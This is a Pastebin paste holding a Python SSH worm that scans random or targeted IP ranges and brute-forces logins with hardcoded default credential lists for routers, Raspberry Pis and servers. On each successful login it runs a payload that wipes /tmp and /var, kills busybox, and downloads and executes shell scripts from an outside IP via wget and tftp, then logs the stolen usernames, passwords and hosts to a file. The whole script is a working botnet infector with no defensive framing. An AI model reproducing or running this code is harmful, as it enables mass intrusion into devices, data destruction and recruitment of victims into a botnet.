API tools faq
paste
Advertisement
Guest User

tt

a guest
Dec 27th, 2016
131
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.61 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #MUST INSTALL PARAMIKO
  4. #yum install python-paramiko -y
  5.  
  6. import threading, paramiko, random, socket, time, sys, os
  7. os.system("ulimit -s 999999; ulimit -n 999999; ulimit -u 999999")
  8. paramiko.util.log_to_file("/dev/null")
  9. os.system("sysctl -w fs.file-max=999999 >/dev/null")
  10.  
  11. cmd='rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;pkill -9 busybox;cd /tmp || cd /var/run;wget http://208.89.211.200/bins.sh;sh bins.sh;rm -rf bins.sh;tftp -r bint1.sh -g 208.89.211.200;sh bint1.sh; tftp 208.89.211.200 -c get bint2.sh; sh bint2.sh; rm -rf bint1.sh bint2.sh bins.sh\r\n' #PAYLOAD
  12. blacklist = [
  13. '127'
  14. ]
  15.  
  16. """
  17. ▄█ ▄███████▄ ▄████████ ▄████████ ▄██████▄ ███▄▄▄▄ ▄████████ ▄████████
  18. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
  19. ███▌ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ █▀ ███ █▀
  20. ███▌ ███ ███ ▄███▄▄▄▄██▀ ███ ███ ▄███ ███ ███ ▄███▄▄▄ ███
  21. ███▌ ▀█████████▀ ▀▀███▀▀▀▀▀ ▀███████████ ▀▀███ ████▄ ███ ███ ▀▀███▀▀▀ ▀███████████
  22. ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ ███ █▄ ███
  23. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  24. █▀ ▄████▀ ███ ███ ███ █▀ ████████▀ ▀█ █▀ ██████████ ▄████████▀
  25. ███ ███
  26. """
  27. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  28. yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
  29. lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
  30. lucky2 = ["119.91","119.92","119.93","113.53"]
  31. lol = ["1","2","5","119","180","113","125","122","46","101",""]
  32. load = ["125.25","125.26","125.27","119.92","119.93","180.180","113.53","185.52","122.52","122.53"]
  33. god = ["122.52","122.53","119.92","119.93"]
  34.  
  35. """
  36. ▄███████▄ ▄████████ ▄████████ ▄████████ ▄████████ ▄██████▄ ▄▄▄▄███▄▄▄▄ ▀█████████▄ ▄██████▄ ▄████████
  37. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄██▀▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███
  38. ███ ███ ███ ███ ███ █▀ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀
  39. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄██▀ ███ ███ ███
  40. ▀█████████▀ ▀███████████ ▀███████████ ▀███████████ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀██▄ ███ ███ ▀███████████
  41. ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ██▄ ███ ███ ███
  42. ███ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  43. ▄████▀ ███ █▀ ▄████████▀ ▄████████▀ ████████▀ ▀██████▀ ▀█ ███ █▀ ▄█████████▀ ▀██████▀ ▄████████▀
  44. """
  45.  
  46. if sys.argv[4] == '1':
  47. passwords = ["root:root", "root:admin", "admin:1234"]
  48. if sys.argv[4] == '2':
  49. passwords = ["root:root", "root:toor", "root:admin", "admin:1234", "oracle:oracle", "root:alpine"]
  50. if sys.argv[4] == 'routers':
  51. passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password"]
  52. if sys.argv[4] == 'perl':
  53. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ]
  54. if sys.argv[4] == 'ubuntu':
  55. passwords = [ "ubnt:ubnt", "ubnt:1234", "ubnt:password" ]
  56. if sys.argv[4] == 'root':
  57. passwords = [ "root:root","root:test" ]
  58. if sys.argv[4] == 'vps1':
  59. passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Love2020", "root:Zero", "root:Password", "root:password"]
  60. if sys.argv[4] == 'vps2':
  61. passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"]
  62. if sys.argv[4] == 'vps3':
  63. passwords = [ "root:maxided", "root:centos6svm", "root:football", "root:monkey", "root:696969", "root:abc123"]
  64. if sys.argv[4] == 'r00ted':
  65. passwords = [ "localhost:root", "B1NARY:B1NARY", "root:r00tnull3d#", "root:Flunzy2016", "bash:root"]
  66. if sys.argv[4] == 'brute':
  67. passwords = [ "root:centos6svm", "root:root", "root:toor", "root:abc123", "root:maxided"]
  68. if sys.argv[4] == 'lol':
  69. passwords = [ "admin:1234"]
  70.  
  71. """
  72. ▄█ ▄███████▄ ▄████████ ▄█ ▄████████ ▄████████ ▄████████ ▄████████ ▄████████
  73. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  74. ███▌ ███ ███ ███ █▀ ███ ███ ███ ███ █▀ ███ █▀ ███ █▀ ███ █▀
  75. ███▌ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ███
  76. ███▌ ▀█████████▀ ███ ███ ▀███████████ ▀███████████ ▀███████████ ▀▀███▀▀▀ ▀███████████
  77. ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ █▄ ███
  78. ███ ███ ███ ███ ███▌ ▄ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ▄█ ███
  79. █▀ ▄████▀ ████████▀ █████▄▄██ ███ █▀ ▄████████▀ ▄████████▀ ██████████ ▄████████▀
  81. """
  82. ipclassinfo = sys.argv[2]
  83. if ipclassinfo == "A":
  84. ip1 = sys.argv[3]
  85. elif ipclassinfo == "B":
  86. ip1 = sys.argv[3].split(".")[0]
  87. ip2 = sys.argv[3].split(".")[1]
  88. elif ipclassinfo == "C":
  89. ips = sys.argv[3].split(".")
  90. num=0
  91. for ip in ips:
  92. num=num+1
  93. if num == 1:
  94. ip1 = ip
  95. elif num == 2:
  96. ip2 = ip
  97. elif num == 3:
  98. ip3 = ip
  99. """
  100. ▄████████ ▄████████ ▄█ █▄ ▄████████ ▄████████ ▄████████ ███▄▄▄▄ ███▄▄▄▄ ▄████████ ▄████████
  101. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███▀▀▀██▄ ███ ███ ███ ███
  102. ███ █▀ ███ █▀ ███ ███ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███
  103. ███ ███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ▄███▄▄▄▄██▀
  104. ▀███████████ ▀███████████ ▀▀███▀▀▀▀███▀ ▀███████████ ███ ▀███████████ ███ ███ ███ ███ ▀▀███▀▀▀ ▀▀███▀▀▀▀▀
  105. ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ █▄ ▀███████████
  106. ▄█ ███ ▄█ ███ ███ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  107. ▄████████▀ ▄████████▀ ███ █▀ ▄████████▀ ████████▀ ███ █▀ ▀█ █▀ ▀█ █▀ ██████████ ███ ███
  108. ███ ███
  109. """
  110. class sshscanner(threading.Thread):
  111. global passwords
  112. global ipclassinfo
  113. if ipclassinfo == "A":
  114. global ip1
  115. elif ipclassinfo == "B":
  116. global ip1
  117. global ip2
  118. elif ipclassinfo == "C":
  119. global ip1
  120. global ip2
  121. global ip3
  122. def run(self):
  123. while 1:
  124. try:
  125. while 1:
  126. thisipisbad='no'
  127. if ipclassinfo == "A":
  128. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  129. elif ipclassinfo == "B":
  130. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  131. elif ipclassinfo == "C":
  132. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  133. elif ipclassinfo == "BRAZIL":
  134. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  135. elif ipclassinfo == "SUPER":
  136. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  137. elif ipclassinfo == "LUCKY":
  138. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  139. elif ipclassinfo == "LUCKY2":
  140. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  141. elif ipclassinfo == "RAND":
  142. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  143. elif ipclassinfo == "INTERNET":
  144. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  145. elif ipclassinfo == "LOAD":
  146. self.host = random.choice(load)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  147. elif ipclassinfo == "GOD":
  148. self.host = random.choice(god)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  149. else:
  150. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  151. for badip in blacklist:
  152. if badip in self.host:
  153. thisipisbad='yes'
  154. if thisipisbad=='no':
  155. break
  156. username='root'
  157. password=""
  158. port = 22
  159. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  160. s.settimeout(3)
  161. s.connect((self.host, port))
  162. s.close()
  163. ssh = paramiko.SSHClient()
  164. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  165. dobreak=False
  166. for passwd in passwords:
  167. if ":n/a" in passwd:
  168. password=""
  169. else:
  170. password=passwd.split(":")[1]
  171. if "n/a:" in passwd:
  172. username=""
  173. else:
  174. username=passwd.split(":")[0]
  175. try:
  176. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  177. dobreak=True
  178. break
  179. except:
  180. pass
  181. if True == dobreak:
  182. break
  183. badserver=True
  184. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  185. output = stdout.read()
  186. if "inet addr" in output:
  187. badserver=False
  188. if badserver == False:
  189. print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port)
  190. ssh.exec_command(""+cmd+"")
  191. time.sleep(20)
  192. ssh.close()
  193. open("infected.txt","a").write(username+":"+password+":"+self.host+"\n")
  194. except:
  195. pass
  196.  
  197. for x in range(0,int(sys.argv[1])):
  198. try:
  199. t = sshscanner()
  200. t.start()
  201. except:
  202. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!